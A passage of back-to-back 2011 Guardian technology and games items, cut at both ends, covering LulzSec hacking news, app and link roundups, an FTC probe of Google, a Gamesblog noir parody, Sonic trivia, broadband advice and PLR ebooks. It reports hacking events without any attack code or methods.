and also expresses awe at a review from a user saying the app had sparked "the first non-aggressive play interaction between her autistic son and her daughter".Toca Boca is also strong on the fact that its games are all paid titles, with no advertising or use of in-app payments. Jeffery stresses that he is not opposed to use of IAP itself, but takes a hardline stance on its inclusion in apps made for children, citing previous discussion around children making large virtual purchases in iOS games like Smurfs' Village that were charged to their parents' iTunes accounts."By making products and putting them in the kids category, you should have disqualified yourself from using that technique," he says. "We have to make our money somewhere else. Developers must take bigger responsibility, rather than expecting parents to have the level of knowledge on how in-app payments work. If we want to build any kind of credibility, we can't start using these mechanics."For now, Jeffery hopes that Toca Boca will become a recognisable brand to parents, as the company launches more apps that may feature characters and elements from previous titles. What about looking beyond iOS? Jeffery says that the decision to avoid ads or IAP are a barrier to diving onto Android."So far, iOS is the only platform on which apps are being sold in a great number," he says. "If you're not doing advertising or IAP, this is clearly an iOS market for now. Android Market and the likes are broken: they just don't work from a purchasing point of view for various reasons."However, he says that Toca Boca is not writing Android off altogether, and is keeping a keen eye on any data that shows Android Market or comparable stores are becoming more lucrative for paid apps."I'm very interested in it from a marketing point of view, because it's a more open ecosystem where you can use more things: bundle apps together with others, or give them away with partners," he says."It's a free-er ecosystem to work with, but no one's buying anything. The sooner that changes, the better. We're looking forward to the day when these stores work, because there are plenty of Android users out there."
The website of the notorious hacking collective LulzSec was temporarily crippled on Friday morning after an apparent retribution attack by an ex-military hacker.The lone-wolf operator, known as the Jester,claimedappeared to claim to have downed the LulzSec website "for the lulz" and expose its shadowy leader in a Twitter message on Friday. Themain LulzSec websitewas down for a short time on Friday morning but resurfaced shortly after.Update:The Jester says he "did not engage" the LulzSec website, pointing to another lone-wolf hacker, Oneiroi. See earlier update at foot of post.The Jester, notorious in the online hacking community, has waged a long-running battle with senior members of Anonymous and its splinter group LulzSec.Significantly, the Jester alsopostedwhat appears to be an attempt to out the founder and leader of LulzSec, a long-term hacker known as Sabu. The investigation pieces together a trail of information gathered from public and private social networks and concludes the following:Name(s): Xavier Kaotico, Xavier de LeonEmail: [redacted by the Guardian]Age: 30 as of 2011-06-21Location: Possibly New York City, NY (has lived there)Websites: sabu.net, pure-elite.org, confinement.orgProfession: Independent IT consultantInterests: Python programming, Linux, network security, exploit developmentAttempts to name-and-shame each other has become a feature of the online hacking community.The Jester is one of the most closely-guarded activists, with numerous attempts to reveal his real-life identity by Anonymous members apparently falling short. Most have a number of online sobriquets which change hands almost as often as they change targets.Overnight, LulzSecclaimed to have hackedinto the website and database of the Arizona Department of Public Safety and released a tranche of allegedly confidential information.The group also denied claims it was behind an attack on servers used by the Sun:Update:Another lone-wolf hacker, Oneiroi, is claiming credit for crippling LulzSec's website.Writing on his blog, Oneiroi says: "I'm afraid I'm unable to post a mission statement at this time. I'd like to let the public know that phase one of OPERATION SUPERNOVA has been successful.  Lulzsecurity.com is Tango down at this time. The attack will stop by Midnight PST.  Also, Cloudflare is not my target. Please don't argue that lulzsec is up. Cloudflare creates a backup of the website. It's doing its job.  I want to make it bloody clear that Cloudflare isn't my target."
A burst of 15 apps for your considerationTapNavmSonar's TapNav is a GPS navigation app for iPhone whose big feature is its use of augmented reality: overlaying directions on the iPhone's camera feed of the actual road in front. It's the iPhone equivalent of Android app Wikitude Drive, which offers similarly AR-fuelled navigation.EpixEpix is the official Android app for the US TV channel of the same name – a joint venture between Paramount Pictures, MGM and Lionsgate. The app enables people to watch films and extra content on their device, and is free for Epix subscribers, with a 14-day trial for non-subscribers. The decision to launch on Android is newsworthy too – at the time of writing, there is no iOS version available.Tiny LightsThere's a lot of buzz around iPhone game Tiny Lights this week, for its characterful graphics and thorny puzzles. Released by creative agency Darling Dash, it was co-developed with Fluid Pixel Studios and CodeworksDev.Cut The RopeCut The Rope was a big hit on iPhone, but now it's been released for Android as a free game, following in the footsteps of Angry Birds. Interestingly, it appears to be published by the original developer ZeptoLab, rather than the iOS publisher Chillingo – another parallel with Angry Birds.Update:for now, it is exclusive to independent app store GetJar, so you won't find it on Android Market.KabbeeKabbee is a London-focused minicab price comparison and booking app, pulling in fares from 60 companies to give the best price. It's initially available on iPhone, with an Android version following in July.Copa America TVMobile TV firm MobiTV has published an iPhone and iPad app for the Copa America football tournament, promising a mixture of highlights and live matches. It's available in the UK as well as in the Americas.Hard Rock CallingVodafone has launched the official iPhone and Android app for London's Hard Rock Calling music festival, offering artist info, stage schedules, photo galleries and an interactive venue map, with additional rewards for Vodafone customers.Mini CafeMini Cafe is the latest iOS social game from SGN, the developer that was recently acquired by MindJolt (which in turn is a social gaming publisher led by former Myspace boss Chris DeWolfe). This particular game focuses on running a restaurant – a popular genre on Facebook but still relatively fresh on iOS.Top 100 AlbumsDeveloper Amber Books has released an iPhone and iPad app that digs into the top selling albums of the 1960s, 70s, 80s, 90s and 2000s. It includes biographical information, statistics and trivia quizzes, with prominent buttons to tap through to buy albums from the iTunes Store.wt360 Prowt360 Pro makes the ambitious promise of providing weather forecasts for 195 countries up to a year in advance, based on data by Weather Trends International. Would be great for Glastonbury 2012 if it wasn't taking a gap year.Shadow CitiesInnovative location-based iPhone game Shadow Cities has been a huge hit in its native Finland, but now it has expanded to 13 other European countries, including the UK. It's a potent mix of real-world locations and RPG-style progression.Sunshine Cruise LinesSunshine Cruise Lines is the latest mobile social game for iPhone and iPad from developer IUGO, focusing on running a virtual cruise ship.Playing RapperRockin' Labs is the latest developer looking to compete with Outfit7 in the talking character genre. Playing Rapper is a virtual rapper who can repeat what you say, but also beatbox, scratch virtual records and email graffiti to your friends. He joins Playing Cowboy and Playing Teddy Bear in the developer's stable of apps.ViaMichelin MobileViaMichelin's new iPhone app combines route-planning and mapping with content from the Michelin guide to hotels and restaurants.Set List ShakerSet List Shaker is a very clever app for musicians, letting them log their set lists for every gig they play, compile new ones and email them out to the rest of the band.You can followGuardian Apps Blog's Apps rush on deliciousTo suggest links, tag articles on delicious.com with "guardianappsblog"
A burst of 6 links for you to chew over, as picked by the Technology teamApple strangleholds worldwide battery output &gt;&gt; The Register"Ultrathin notebooks may be all the rage these days, but there's one big barrier standing in the way of their seemingly unstoppable march to market dominance: Apparently, Apple has a stranglehold on the batteries needed to power them."Stop just a minute and think about this, though (it's based on a report in Digitimes). Apple has about 4% of the entire PC market; slightly more of the overall laptop market. It ships about 10m per year.If Apple has cornered the market for ultrathin laptop batteries, you'd have to conclude that it's a very tiny market if the other makers of the 95% of laptop PCs can't get a look in. It's possible this is right, but surprising if so.Massive profits fuelling rogue antivirus market &gt;&gt; Brian Krebs's Security Fix"TrafficConverter.biz was dismantled on Nov. 29, 2008, most likely because the same domain was referenced deep inside the guts of the Conficker worm, a family of malware that is estimated to have infected at least 10 million Microsoft Windows systems.&#10;"Prior to site's demise, security researchers managed to snag a copy of the database for the TrafficConverter affiliate program. While that data set is incomplete, the information available on the top-earning affiliates helps explain why so many consumers are reporting infections from rogue anti-virus products: Successful affiliates are making money hand over fist with these programs."November 2010: Nokia closes Symbian to the world: can MeeGo make up the gap? &gt;&gt; Guardian Technology"There's only one problem at the moment with MeeGo: nobody outside about 10 developers with l33t hax0r skills has got it running on a phone. Reports emerging form some of those close to MeeGo suggest that it might not be until June 2011 that the first MeeGo handset appears from Nokia."For all your MeeGo news, indeed.Lytro: how did you say it focuses after you take the picture again? &gt;&gt; jwzOf the claims for a startup that says it focusses the picture *after* it has been taken: "I still don't understand how you de-focus light that has already passed through a lens (and there is a lens in front of this array of tiny lenses) or how having one lens per pixel gets you the direction of the ray. Because throwing away that information is what lenses are for."It's either brilliant - Google brilliant - or it'sNimsloall over again.Windows 8 for software developers: the Longhorn dream reborn? &gt;&gt; Ars Technica"The situation probably won't be as grim as many developers fear. Early milestone builds of Windows 8 have leaked onto the Internet, and considerable effort has been put into figuring out how they work. Though officially tight-lipped, snippets of information have escaped Redmond's walls. So far, it appears that Windows 8 development doesn't just look not bad—there are signs that it will actually resolve many long-standing annoyances with writing Windows software. If Microsoft can pull off everything it's hoping to achieve with the platform, Windows 8 will be as important and radical a release as Windows Longhorn was going to be."Until they discovered that they couldn't build it using traditional methods, that is. Long, but worth reading.MeeGo and the Great Betrayal Myths of tech history &gt;&gt; The RegisterAndrew Orlowski: "MeeGo isn't coming back, and to me, looks to have all the makings of a betrayal myth. These are popular with idealistic political groups, usually (but not always) on the Left, for whom Being Right is more important than Winning. I suppose it's been around since Marx's false consciousness (although he never used the phrase); and eventually Being Right becomes the whole point.&#10;"It's not about taking power, or making it work, but demonstrating one's splendid ideological purity. Betrayal myths are also popular with technology enthusiasts too - I know, because I've seen several.&#10;"In this narrative, a bold and brilliant piece of technology is thwarted not because it isn't good enough, or has failed in the marketplace, but because of (delete where applicable) marketing incompetence, or nefarious interference. If that interference comes from Microsoft, so much the better."You can followGuardian Technology's linkbucket on deliciousTo suggest links, tag articles on delicious.com with "guardiantech"
The hacking collective LulzSec says it has hacked into the website and database of the Arizona Department of Public Safety (DPS) and released details of staff, emails and correspondence on public file-sharing sites.A number of DPS officers told the Associated Press that they had been inundated with calls to their home and mobile phones from strangers on Thursday night, and that they were trying to change their numbers.A DPS spokesman confirmed that the agency's computer system had been breached and was taking additional security safeguards that he wouldn't disclose.The hackers said they had specifically targeted the department in that state because of its tough immigration law "and the racial profiling anti-immigrant police state that is Arizona". Arizona has introduced tough identification laws which have been criticised by President Obama and others. However, they have been frozen due to legal challenges.But even as the details were being released, pressure was growing on the group from rival hackers unhappy about what they see as a lack of discretion in the choices of its targets. LulzSec has taken credit for hacking into Sony Pictures Europe, a number of games sites including Eve Online and Sega, defacing the PBS website and attacking the CIA website, the US Senate computer systems and the UK's Serious Organised Crime Agency.The collective said on its website that it was releasing "hundreds of private intelligence bulletins, training manuals, personal email correspondence, names, phone numbers, addresses and passwords belonging to Arizona law enforcement."The LulzSec group also said it planned to release "more classified documents and embarrassing personal details of military and law enforcement" every week but it was unclear whether other Arizona agencies have been targeted.Meanwhile rival hackers, including one called The Jester – an ex-US military member – have been concentrating on tracking down the group's website and identifying its members. The Jester said on Twitter on Thursday that he had traced the Lulz Security website to an ISP in Malaysia, and provided a program for people to help track it down.Other hackers are also trying to gather data about the group, which the Guardian understands was weakened earlier this month after some members worried about the outcome of attacking US government sites. In the UK one man, Ryan Cleary, has beenarrested by the police and charged with offencesunder the Computer Misuse Act relating to attacks on a number of sites including Soca's.The Maricopa County Sheriff's Office in Arizona was taking unspecified countermeasures to protect its computer system, officials there said on Thursday night.Manuel Johnson, a spokesman for the FBI's Phoenix division, said the agency was aware of the situation but couldn't comment on whether the FBI was investigating it.The Arizona Republic reported that experts worked Thursday evening to close external access to DPS' system.
It's Friday! What games will you be playing this weekend? Tell us!
US regulators are poised to launch a formal investigation into whether Google has abused its dominance on the web, according to reports.The Federal Trade Commission (FTC) is days away from serving subpoenas on the internet giant in what could be the biggest investigation yet of the search company's business,according to The Wall Street Journal. Both Google and the FTC declined to comment.A wide-ranging investigation into Google has been discussed for months. Google has faced several antitrust probes in recent years, and is already the subject of a similar investigation in Europe. In the US inquiries have so far largely been limited to reviews of the company's mergers and acquisitions.The  inquiry will examine the heart of Google's  search-advertising business, and the source of most of Google's revenue. Google accounts for around two-thirds of internet searches in the US (and close to 90% in the UK) and according to critics unfairly uses that dominance to favour its own growing network of services.Last November, the European commission opened its own formal investigation into allegations that Google discriminated against competing services in its search results and prevented some websites from using ads by Google competitors."This is a major headache for Google even if they ultimately prevail in court," said Professor Christopher Yoo of the University of Pennsylvania Law School. "The US and EU often share information and these dual investigations can be very effective."Legal experts said the investigation could be similar in scale to the massive antitrust probe of Microsoft, which started in 1991 and ended in a settlement a decade later. Professor Joshua Wright of George Mason Law School said: "The investigation will be of a comparable scale to that of Microsoft."But he said the chances of Google being found guilty of antitrust behaviour, as Microsoft was, were far smaller. Wright said for the US to bring a successful case against Google, it would have to prove the company was harming consumers. "As an outsider I would say that obstacle is far higher for them today with Google than it was back then with Microsoft," he said.Yoo said: "The reality is that changes in antitrust laws in the US have made it much harder for the government to prevail."He said Google faced a higher risk in the EU case but that in either case the investigations were likely to have a profound impact on the firm."Even if the charges are ultimately bogus, they will occupy many, many hours of managements time and attention," he said.The FTC's investigations are likely to widen to other companies as official requests for information about their dealings with Google.The company has long denied any anticompetitive behaviour, arguing that users can easily click on other choices on the web."Given our success and the disruptive nature of our business, it's entirely understandable that we've caused unease among other companies and caught the attention of regulators," Google executives wrote in a company blog post after the official European probe was launched last year.
The journalist hunched over his battered Remington typewriter. It was late, too late, but he had a report to file and it was unlike any report he'd ever filed before. After a second slug of whisky it still made little sense. It was supposed to be a straight up diary piece supplied by readers of the newspaper's daily Chatterbox column. But the readers seemed to have had other ideas.Someone had been playing LA Noire. Too much.The hack grasped the report. "What the heck am I going to do with this?" he thought.He took another slug.This is what he read...31/05/11Report by operatives codenamed Sam and Brian.He drained the glass of bourbon and slammed it down on the desk with a bang, instantly opening the drawer and taking out the bottle to pour another."None of this makes any god damn sense Sam!" Brian cried, gesturing angrily towards the brown file in front of his partner, the file marked with the badge of the police department, the file that had been thrust under his office door earlier that day.The street lights glared through the blinds, casting dark bands of shadow across the tiny cluttered office, with its faded pictures from his days still in the force and the peeling black letters spelling out "B. Adenhart- Private Eye" on the frosted glass panel of the door.Sam reached for the file and turned to the first page, reading aloud:"Case 31459: Missing Chatterbox….last seen: 30th of May…unconfirmed rumours of whereabouts…no suspects to date""Talk on the streets is of television cabinets, something called NP (possibly a new drug?) a Doctor Wu. Some Soccer game over in Europe and a 'Tamzin Outhwaite effect.' Nothing pertaining to the case"Brian took another large gulp of his drink, before reaching over his colleague and turning to a page of witness statements, "nobody ever sees anything in this god damn town!"The phone rang, which was strange – the phone never rang. He brushed aside the detritus to uncover it. "Hello?…" Sam watched as Brian listened silently for a minute before slamming the receiver down. Excitedly reaching for his hat and coat, he said, "Get the car, we've got someone to see… bring the file!"Racing through the streets in the battered Chrysler not wasting a second, Sam slumped in the passenger seat. "Sso…where are we going?" The private eye turned to his partner, a glint in his eye, "the last person to see it before it went missing, the newspaper vendor, Keith."Tearing round the last corner before the street where Keith hawked his wares the car almost crashed into an expensive-looking Cadillac. As the two cars passed, the drivers caught each other's eyes, a smile cracked on the other driver's face before they speed away in opposite directions"…that wasn't…" Adenhart said to himself "…it can't be… he's dead…"He pulled up to the little pile of newspapers but lKeith was nowhere to be seen…"Listen!" sam whispered. "There's something coming from that alley"The two men took out their guns and crept forwards. But any danger had long since passed and the only person in the alley was Keith, slumped against the brick wall, blood everywhere."Damn it! Too late" Sam said as they rant over to help the young lad.Fading in and out of consciousness Keith was talking gibberish."…Political punch ups….nhhh….Tim's abusive dad…."Adenhart grabbed the boy and tried to shake some sense into him."Who did this to you Keith?"No reply. Just more nonsense"Knock Knock jokes… Necrophilia… koala destruction… Rusty on Dinner date…."Finally, silence. Adenhart let go of the youngster's lapel and he slumped back against the wall."He's gone…"But Keith's lips moved, whispering the two words the PI didn't want to hear; the name of the man who flashed that evil smile from the speeding car earlier."Charles…. Arthur"Witness statement of the day"The gravitas of a wood unit"Lazybones. Subject unknown.01/06/11The week was strange and getting stranger. There was no Monday, Tuesday was the same as last Friday and then from nothing I awoke to a fresh box. It seemed too clean, too perfect.  I was already into this too deep with no signs of getting out, my instincts be damned, I had to find out what was going on.My first call was to investigate some complaints regarding the Olympic ticketing system. Killerbee was happy to go on the record:"Could a more shambolic system of allocating tickets for a major sporting event have been devised if they'd tried?"I'm not sure who he was complaining at; there wasn't much ire to raise amongst the rest of the community. A resigned sense of expectancy. Local (alleged) mob boss HereComesTreble put the matter to rest:"Pret a Manger is the official sandwich provider of the London Olympics, which says it all really."The corporate talk was giving me a thirst. I swung by a local haunt for some afternoon refreshment. There was a guy in there, he hadn't been around much lately. Lazybones I think they call him. In the haze of the bar he announced:"Bought myself a frying pan last week. I don't know if I mentioned this. Do you think I have become more boring?"I declined to answer. Soon others joined in though. Frying pan discussion. Sizes, cooking techniques and Jamie Oliver. I just wanted some peace and quiet. SuperSmashin got involved:"You all need to aspire to live a one pan life. It's the Lazybones method and I endorse it."Conversation turned to woks. I reconsidered my choices; that unfinished paperwork was suddenly looking more appealing. Then this broad appeared, peering through the darkened entrance. It was Herself. There was a murmuring at the bar. She's got some nerve, I thought. Caused a ruckus in here end of last year. But she wasn't here for trouble. When she left, eyes turned to Tim in the corner, he glanced up, unperturbed:" You know that novelty pizza cutter you wanted? It's mine now. And you can forget about visiting the cat."Case closed.Late on, the bar's recent US acquisition, OpinionatedMike, stumbled in with a bone to picks with yours truly. "I've been depicted inaccurately in BestOf" he drawled. "Now I know what celebrities complain about when the media takes excerpts out of context!"I paid him little attention. He hobbled to a seat nearly falling in his high heels and quietened down.As the day surrendered itself to the embrace of night, I left the bar, approaching my car with much on my mind. I instructed my partner to drive me home; as he did, he backed into four passing cars, ran over an elderly lady and destroyed two lampposts. A quiet drive home. The case notes started to organise themselves in my mind, but I was a long way from solving this.Later, I had an uneasy feeling as I slumped back on my couch, glass of whisky in hand; the sirens of the night serenaded me into a troubled night's sleep.A feeling that the worst is yet to come.Witness Statement of the day:"@Flat bottomed woks: Make the woking world go round."EnglishRed.02/06/11The old man kept us waiting in the steam-filled sauna he passed off as a gardenia potting shed. I wasn't going to let him get to me, and no matter how much he turned up the heat, how much he filled the room with sweltering mooks, I wasn't going to break.Even when the paper snap on collar I wore over this two-bit thrift store suit melted into my shirt, and my eyes filled with sweat, blinding me to what was going on, I still wouldn't break.Even with the temptation of three free downloads from the fully restored PSN store, I wasn't going to break.What broke me was pure Bladestone, the thought of some poor schmuck, brought into this country in the bilge of a Shanghai merchant vessel, swam ashore from The Rock in the bay, his buddies - shark bait, or torn apart on the spikes down at Old King Allant point, just to smuggle this precious drug to these virgin shores. This is what broke me.Some gook threw me to the floor, the mickey-finn turning the already upside down world of not Thursday into some horror show re-run of the day before. He knotted my Macy's tie around my bicep, slapped my wrist for a vein to pump the pure Bladestone into, and ran me through with his needle.Having lost all concept of time, I couldn't tell you how long it was before I was seeing skeletons and dragons, leathery wasted men swinging at me with flaming swords, and angels and knights Templar on battlement walls. And then the acrid smell of swamp gas. I was falling through a fog gate, a gate of fog, golden, golden gate in the fog. This is San Francisco, this is NaN Thursday, this is just a precursor of a Dark Soul.And then I remember nothing.Until...03/06/11A tall blonde walked past my office window. I could tell she was tall as I worked on the second floor. I could tell she was blonde, because she moulted all over the swivel chair across from my desk. But these are the things you need to do when a private dick needs a secretary that will work long hours for short pay.Speaking of those who are working for short pay and paying a little too much attention to the dame in the chair, today was full of useful tips for interviewing skills. Seems that seven hours twelve minutes a day of internet time is not seen as productive time well spent by many of this country's captains of industry.Turned out I wasn't the only detective for hire looking to fill a blonde shaped hole in my office; Sorbicol had been interviewing some hopeful nineteen-year-olds, obviously to help him out with the extraordinary time he spent on the internet. The louse was keen to pass on the list of psychological profiling questions he had prepared. Not that he prepared them himself, he had some poor child from the HR department prepare them, plausible deniability, children, pay attention, this was the first lesson.It seemed Sorb was not the only one seeking new flesh. While the government was trying to tell us we were in a recession, BlueAndWhiteBoy seemed to think it would be okay to make his four candidates fight to the death for the three posts. I fought in a war so men like this could run this country. I should be so proud of these two.I was afraid for the rest of us proles, sitting on the other side of the interviewing desk was our lot.Having debated the benefits of telling the truth in exit interviews, and the pros and cons of using Linkedin and Facebook to find dirt on your interview panel, the dame across from me opened her heart to us. She was attempting to answer that perennial interview question: "What is you greatest weakness?"This should have been obvious for a band of social misfits who spent all day every day talking about games, that they then spent all night every night playing. And I'm not talking about healthy games, I'm talking about Blood Bowl and World of Tanks, here. Backstreet dive games, for desperate men.This is a transcript of the witness statements.jakelly:"I've not removed all the labels from my clothes."Scamander:"I have a fire allergy."RustyJames:"I'd recommend lying through your teeth."Lazybones:"I don't do any work until mid-day."SBY818:"I often don't get  the full scale of my genius across in interviews."SirGiggidy:"I'll drink my wages back into the till."All interesting response, but not quite as pertinent as OpininatedMike's tips for handling interviews.: "Answer questions firmly, seriously and without hesitation.""Wait a second Mike," I said. "I believe you've just fallen down the fail hole of all chatterbox failures and resorted to quote blog. You have been caught out quoting from the CIA Handbook for fooling polygraph machines."But it was smart advice, and one day I figured, it might just save my life.Mike, this drink's for you.End gameJoin theofficial Gamesblog spotify listand share your own favourite tunes. Last addition – 'Gimme Culture' by Red Bacteria VacuumCheck theGamesblog wikifor everyone's game tags and more!This week's 'Best of' was written by Smellavison, Onedaveofmany, St00 and TJVS. It was edited by Smellavision
FBI agents investigating the activities of the alleged hacker Ryan Cleary have flown into Britain.Cleary, 19, who appeared before magistrates on Thursday, was arrested on Monday as part of an investigation into cyber-attacks in Britain and the US. Hours after his arrest at Cleary's family home in Wickford, Essex, the FBI agents arrived in the UK, it has emerged,  which will add to speculation that Washington is considering a request for his extradition.Cleary has been charged with five offences of hacking that are alleged to have targeted three British based websites. Police and FBI investigations continue.Cleary appeared at City of London magistrates court charged with a cyber-attack on Monday on Britain's Serious Organised Crime Agency (Soca), attacks on the International Federation of the Phonographic Industry in November 2010, and on the British Phonographic Industry in October 2010.His arrest was linked to a series of cyber-attacks by a group called LulzSec, which investigators believe had targeted websites including ones belonging to the American CIA, the US Senate and the electronics company Sony.Because Cleary has been charged in the UK, that case would take precedence over any extradition request from the US.The FBI, which gives cyber-crime high priority, is expected to be given access to evidence collected by British police from Cleary's computer equipment recovered from his family home. The FBI is expected to attempt to conduct its own questioning of the teenager.In court, district judge Quentin Purdy told Cleary: "There may be additional charges resulting from the police investigation."Ben Cooper, defending Cleary, described him as a "vulnerable young man".The teenager is being detained at Charing Cross police station in central London for further questioning.
Thursday 23 June marks the 20th anniversary of one of the biggest gaming icons in the word – Sega's little blu mascot, Sonic the Hedgehog.From the day of release of the first game, Sonic The Hedgehog, back in 1991 on the Mega Drive console, Sonic quickly became a popular gaming icon due to his super speed and his cool, edgy character.According to game developer Sega, since then Sonic has become a hero for a generation, and has appeared in more than 65 games. As well as games, the little hedgehog has enjoyed huge success in areas such as comics, clothes and toys – and even starred in his own animated series.Despite 20 years of fame, the prickly creature is just 15 years old and has not aged a day since his first appearance. With more than 70m copies of his games sold worldwide, and two more coming along later this year, Sonic's popularity looks set to continue.20 facts about Sonic that you may have already known1.More than 70m Sonic games have been sold2."Project Needlemouse" was the name given to the Sonic project3.Sonic is 15 years old and has never aged4.An estimated 60 million people have played at least one Sonic game5.Sonic runs faster than the speed of light and is officially the fastest video game character of all time (according to the Guinness Book of Records)6.Sonic was voted the No.1 gaming icon of all time, according to an MSN poll conducted in 20097.Sonic's shoes were inspired by a combination of Santa Claus and the colour red for speed and fire8.Sonic originally had a girlfriend called Madonna and was in a rock band9.Sonic's first appearance was a humble one – as a toy hanging from the rear-view mirror in the little-known arcade racing game Rad Mobile10.Sonic has starred in his own line of comics and in four animated TV series11.Sega sponsored the Williams Grand Prix team and the team's lead driver, Alain Prost, during the 1993 Formula One championship12.Sonic fans have collected more than 70bn rings between them13.Sonic was the first video game character to have a balloon in the Macy's Thanksgiving Day Parade14.Sonic has made cameos in various games including, The Simpsons Game, The Incredible Hulk, Tom and Jerry: The Movie and he has also featured in the Simpsons TV show15.Sonic has appeared in more than 65 games16.Sonic's arch-enemy, Dr Eggman, has an IQ of 30017.Sonic's personality is a juxtaposition of kindness and ferocity18.Sonic hates boredom and being tied down, so much of his time is spent running19.Sonic's favourite food is chilli dogs20.Sonic cannot swim
For many months I've been trying to improve the speed of my broadband, which usually sits at less than 1Mbps. The service – from Demon – is advertised at a maximum of 20Mbps. I have checked the wiring, router, and any security and firewalls on my computer – a Mac.After many phone calls and tests, Demon said that the resistance on the copper line connecting my house to the exchange is too low to support a full signal without dropping the connection, so they have capped it at 2Mbps, but I never get that.They also say that the copper line should be upgraded, and I need to contact BT OpenReach to have this done. I did finally get through to them. They said that the ISP only should contact them, and that they would charge for the engineering work. The cost would either be borne by Demon or Demon would pass it on to me. Demon refuses to engage in this.Should I pursue Demon or BT? Get a new phone line? Is there a special circle in Hell for people with this sort of problem?Robert ZieglerAs you have discovered, in our new competitive broadband market, the buck frequently doesn't stop anywhere. Demon is your internet service provider (ISP), but it sounds as though your broadband is actually provided by BT Wholesale. However, OpenReach looks after the "local loop" part of the network from the exchange to your house. OpenReach is owned by BT Group, but BT has to be treated as just another customer, and you are not a customer as far as OpenReach is concerned.Alternatively, Demon might have sold you an "unbundled" service, under Ofcom's LLU (local loop unbundling) system. This means that a company other than BT may have equipment installed in the local BT exchange, though OpenReach will still be looking after everything between the exchange's MDF (main distribution frame) and your house. Demon is owned by Thus, which is owned by Cable &amp; Wireless (C&amp;W).Either way, you are a Demon customer, and it's Demon's job to sort it out with its suppliers, whether BT or OpenReach or anybody else. Unfortunately, this depends on Demon recognising that the service is defective, and being willing to pay to have it fixed. Since the cost of an OpenReach visit could run to £150 or more, I'd assume this means Demon would be making a hefty loss on your broadband account.The key question is whether you are getting more than the minimum speed. Test your connection usingBT's Speedtester, which will tell you the configured upload and download speeds for your line. Check the results for a statement that reads, in my case: "For your connection, the acceptable range of speeds is 16,000-38,717 Kbps". For your line, the acceptable speeds might be 1,200-4,000 Kbps, or even lower. If so, Demon could argue that if you're getting 1Mbps, the line is working normally.I'll assume that you have rebooted your router by turning it off for three minutes then reconnecting, and that you have run speed tests with different PCs plugged directly into the router. If you can run speed tests with a different Mac or a Windows PC – perhaps a friend can call round with a laptop – then you can make sure your machine is not part of the problem. You should also runTrace Routeto a few remote sites to check that the backbone network is working correctly.Next, log on to your router to see what is happening on your line. The information is technical, but theKitz online forumhas some good guides, includingLine Stats – Explanationand the excellentHow to interpret your ADSL Line Stats. You may not understand the details (I don't), but you can use them to get anestimated line speed. You can also post the numbers in a Kitz forum or inthe Demon forum at ThinkBroadband, where knowledgeable users will try to help.If everything else seems to be working correctly, then perhaps your slow speed is due to a fault in the "local loop" connection or in your local telephone exchange. Local loop problems are commonly caused by some use of aluminium instead of copper wire, badly soldered joints (all connections reduce ADSL speeds), electromagnetic interference (ie, noise) oryour house's internal wiring. The best way to find out is to have an OpenReach engineer come to your house and perform an SFI test (it stands for special faults investigation), including a PQ (pair quality) test.If the network is fine and the local loop passes the test, the fault may be at the exchange. You could try asking for a "lift and shift". This involves an engineer disconnecting your line from one ADSL rack (a digital subscriber line access multiplexer, or DSLAM) in the exchange and connecting it to a different one.If all else fails, the simplest solution is probably to change your ISP, and asking Demon for aMAC (migration access code)might get your complaint taken more seriously. However, if the fault is in the local loop, this may not solve the problem. You may, in fact, just "migrate" from one supplier of BT Wholesale ADSL to another supplier of BT Wholesale ADSL.If you decide to change your ISP, check your local exchange atSam Knows. This will tell you which services are actually available, including BT Wholesale ADSL Max, and any LLU services from O2/Be, TalkTalk/CPW, Virgin Media (Cable), and so on. PlusNet also has a usefulExchange Status Checker. In my case, an SPI visit and Eclipse test showed that my local loop was excellent, and I "solved" a new intermitted fault at the local exchange by upgrading to BT Infinity.I checked your line with the BT Broadband online checker, and (without testing) it estimated that you should get 12Mbps. You should also check the speeds some of your neighbours are getting by asking them or by entering your postcode atbroadbandspeedchecker.co.uk. It makes sense to go with whichever supplier seems to offer the best speeds locally, though this does not guarantee that you will get a good connection.Incidentally, most problems like yours could easily be solved by whacking a WiMax mast onto the roof of every local BT exchange. WiMax (802.16) is like Wi-Fi (802.11), but it works at up to 30 miles and delivers speeds up to 70Mbps, though 10Mbps is more common. WiMax is built into some PCs (not Macs), and Wi-Fi/WiMax Mini PCIe cards cost £30-£40. WiMax is apparently of no interest to the British government, and you will struggle to find a local service. However,Wikipedialists services in central London, Milton Keynes, Newcastle-upon-Tyne and Kent, among others.
With Google clamping down on content farms, the attention of those looking to get rich quickly from churning out content is now turning to major ebook retailers – and to selling stolen and replicated content.A key starting point of the problem is Private Label Rights content (PLR), which allows anyone to buy prewritten content in bulk that they can then make into ebooks or website content. PLR seller Ronnie Nijmeh ofPLR.medescribes it as "royalty-free content, which means, when you pay for a licence, you get the rights to use the content without royalty in nearly any way you please". We might be familiar with that in photographs – the stock photo – but when it comes to words, the idea of reusing them is less well-known. But the explosion in the number of ebook readers has made such reuse suddenly attractive to some.Mark Coker, the founder ofSmashwords, an ebook distributor, sees PLR as "one of the worst threats to ebooks today". It's an easy system to get involved in as well, and "idiots fall prey to the PLR schemes and pay their $24.95 a month or whatever to access vast databases of generic content, and they have the ability to mix and match this content and republish it as an ebook in their own name."This isn't an issue only observed by Smashwords, with AJ McDonald ofLulu, a print and digital book distributor, experiencing similar problems. "A growing concern in the ebook space is the publishing of public domain content. Sites such as Project Gutenberg and Wikipedia make it very possible for potential authors to grab works and [legally] republish them as their own," says McDonald. In the commercial market of ebooks this raises customer concerns over just what is good content, and which books are nothing more than amalgamated online information.Vanessa Reece ofGeekette Marketing, an author developing her own set of PLR, agrees that it is easy to find and to buy. "There are tonnes of places to find free, paid and limited edition PLR online. You only have to type 'PLR' and the subject you need into Google."One prolific author of the type of content highlighted by Coker publishes "a mix of both PLR content and stolen content".In some cases, the person simply smudged out the author name from the book cover image and didn't even bother to enter his own. Other research has highlightedManuel Ortiz Braschi, the creator of 2,879 PLR ebooks and republished public domain content. Doing so is legal; the question is whether it's useful, given that it exists for free online already.Although PLR.me goes through multiple editors and checks when writing its own content (including fact checking and grammar checks) the problems seem to occur after the PLR has been sold. Numerous people can buy the same packs, and in terms of after-sales monitoring, Nijmeh states: "We do spot checks, but it's hard to monitor since some of our members use content in a variety of ways.". This can lead to duplicate versions of the same content. Reece seems to reflect the same view: "In basic PLR you can generally change all aspects of the copy and apply your pen name to it. You can also go ahead and sell that to people".McDonald offers a similar view of the problems faced by such an open platform: "While Lulu's mission is to empower anyone to publish anywhere, anytime; there have been instances of plagiarism and copyright violation."This type of violation was experienced firsthand by SKS Perry who found his book had been taken by another 'author' and was available on Amazon. "I was doing a vanity search of my name on Google when I noticed a page for Amazon.co.uk listing 